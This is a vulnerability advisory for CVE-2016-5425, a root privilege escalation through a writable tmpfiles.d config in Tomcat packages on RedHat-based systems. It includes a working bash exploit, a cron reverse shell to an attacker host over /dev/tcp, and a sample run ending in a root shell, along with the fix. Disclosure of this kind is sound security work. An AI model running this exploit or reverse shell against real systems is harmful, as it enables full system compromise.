扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 |
============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid (at) legalhackers.com - CVE-2016-5425 - Release date: 10.10.2016 - Revision: 1 - Severity: High ============================================= I. VULNERABILITY ------------------------- Apache Tomcat (packaging on RedHat-based distros) - Root Privilege Escalation II. BACKGROUND ------------------------- "The Apache Tomcat® software is an open source implementation of the Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket technologies. The Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket specifications are developed under the Java Community Process. The Apache Tomcat software is developed in an open and participatory environment and released under the Apache License version 2. The Apache Tomcat project is intended to be a collaboration of the best-of-breed developers from around the world. Apache Tomcat software powers numerous large-scale, mission-critical web applications across a diverse range of industries and organizations. Some of these users and their stories are listed on the PoweredBy wiki page. " http://tomcat.apache.org/ III. INTRODUCTION ------------------------- Apache Tomcat packages provided by default repositories of RedHat-based distributions (including CentOS, RedHat, OracleLinux, Fedora,etc.) create a tmpfiles.d configuration file with insecure permissions which allow attackers who are able to write files with tomcat user permissions (for example, through a vulnerability in web application hosted on Tomcat) to escalate their privileges from tomcat user to root and fully compromise the target system. IV. DESCRIPTION ------------------------- The vulnerability stems from the tomcat.conf file installed by default by packages on RedHat-based systems with write permissions for the tomcat group: [root@centos7 ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf -rw-rw-r--. 1 root tomcat 361 Oct9 23:58 /usr/lib/tmpfiles.d/tomcat.conf The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage temporary files including their creation. Attackers could very easily exploit the weak permissions on tomcat.conf to inject configuration that creates a rootshell or remote reverse shell that allows them to execute arbitrary commands with root privileges. Injected malicious settings would be processed whenever /usr/bin/systemd-tmpfiles gets executed. systemd-tmpfiles is executed by default on boot on RedHat-based systems through systemd-tmpfiles-setup.service service as can be seen below: ---[ /usr/lib/systemd/system/systemd-tmpfiles-setup.service ]--- [...] ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev ---------------------------------------------------------------- Depending on the system in use, the execution of systemd-tmpfiles could also be triggered by other services, cronjobs, startup scriptsetc. The vulnerability could potentially get exploited by remote attackers in combination with a vulnerable web application hosted on Tomcat if they managed to find a path traversal (e.g in a file upload feature) or an arbitrary file write/append vulnerability. This would allow them to append settings to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root privileges without a prior local access/shell on the system. This vector could prove useful to attackers, for example if they were unable to obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a vulnerable file upload feature due to restrictions imposed by Tomcat security manager, or a read-only webroot etc. It is worth to note that systemd-tmpfiles does not stop on syntax errors when processing configuration files which makes exploitation easier as attackers only need to inject their payload after a new line and do not need to worry about garbage data potentially prepended by a vulnerable webapp in case of Arbitrary File Write/Append exploitation. V. PROOF OF CONCEPT EXPLOIT ------------------------- -----------[ tomcat-RH-root.sh ]--------- #!/bin/bash # Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit # CVE-2016-5425 # # Full advisory at: # http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html # # Discovered and coded by: # Dawid Golunski # http://legalhackers.com # # Tested on RedHat, CentOS, OracleLinux, Fedora systems. # # For testing purposes only. # ATTACKER_IP=127.0.0.1 ATTACKER_PORT=9090 echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *" echo -e"Discovered by Dawid Golunski\n" echo "[+] Checking vulnerability" ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat' if [ $? -ne 0 ]; then echo "Not vulnerable or tomcat installed under a different user than 'tomcat'" exit 1 fi echo -e "\n[+] Your system is vulnerable!" echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..." cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.conf C /usr/share/tomcat/rootsh 4770 root root - /bin/bash z /usr/share/tomcat/rootsh 4770 root root - F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n" _eof_ echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:" cat /usr/lib/tmpfiles.d/tomcat.conf echo -e "\n[+] Payload injected! Wait for your root shell...\n" echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), the rootshell will be created in /usr/share/tomcat/rootsh. Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n" --------------[ eof ]-------------------- Example run: -bash-4.2$ rpm -qa | grep -i tomcat tomcat-7.0.54-2.el7_1.noarch -bash-4.2$ cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) -bash-4.2$ id uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 -bash-4.2$ ./tomcat-RH-root.sh * Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 * Discovered by Dawid Golunski [+] Checking vulnerability -rw-rw-r--. 1 root tomcat 43 Oct 10 02:39 /usr/lib/tmpfiles.d/tomcat.conf [+] Your system is vulnerable! [+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf... [+] /usr/lib/tmpfiles.d/tomcat.conf contains: f /var/run/tomcat.pid 0644 tomcat tomcat - C /usr/share/tomcat/rootsh 4770 root root - /bin/bash z /usr/share/tomcat/rootsh 4770 root root - F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n" [+] Payload injected! Wait for your root shell... Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), the rootshell will be created in /usr/share/tomcat/rootsh. Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090 -bash-4.2$ nc -l -p 9090 bash: no job control in this shell [root@centos7 ~]# id id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023 [root@centos7 ~]# ls -l /usr/share/tomcat/rootsh ls -l /usr/share/tomcat/rootsh -rwsrwx---. 1 root root 960392 Aug2 12:00 /usr/share/tomcat/rootsh [root@centos7 ~]# VI. BUSINESS IMPACT ------------------------- Attackers who have gained access to tomcat user account or the ability to write files as tomcat user could escalate their privileges to root and fully compromise the affected system. As explained in section IV., the vulnerability could potentially get exploited by remote attackers in combination with certain web application vulnerabilities to achieve command execution without prior shell access. VII. SYSTEMS AFFECTED ------------------------- Multiple versions of Tomcat packages on RedHat-based systems are affected. The vulnerability was confirmed on Tomcat installed from default repositories on the following systems: - CentOS - Fedora - Oracle Linux - RedHat Refer to information provided by your distribution to obtain an exact list of vulnerable packages. Detailes provided by RedHat can be found at: https://access.redhat.com/security/cve/CVE-2016-5425 VIII. SOLUTION ------------------------- Adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file to remove write permission for the tomcat group. Alternatively, update to the latest packages provided by your distribution. Confirm the file permissions after the update. IX. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html The source code of the exploit (tomcat-RH-root.sh) can be downloaded from: http://legalhackers.com/exploits/tomcat-RH-root.sh CVE-2016-5425 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425 https://access.redhat.com/security/cve/CVE-2016-5425 X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 10.10.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. |
体验盒子
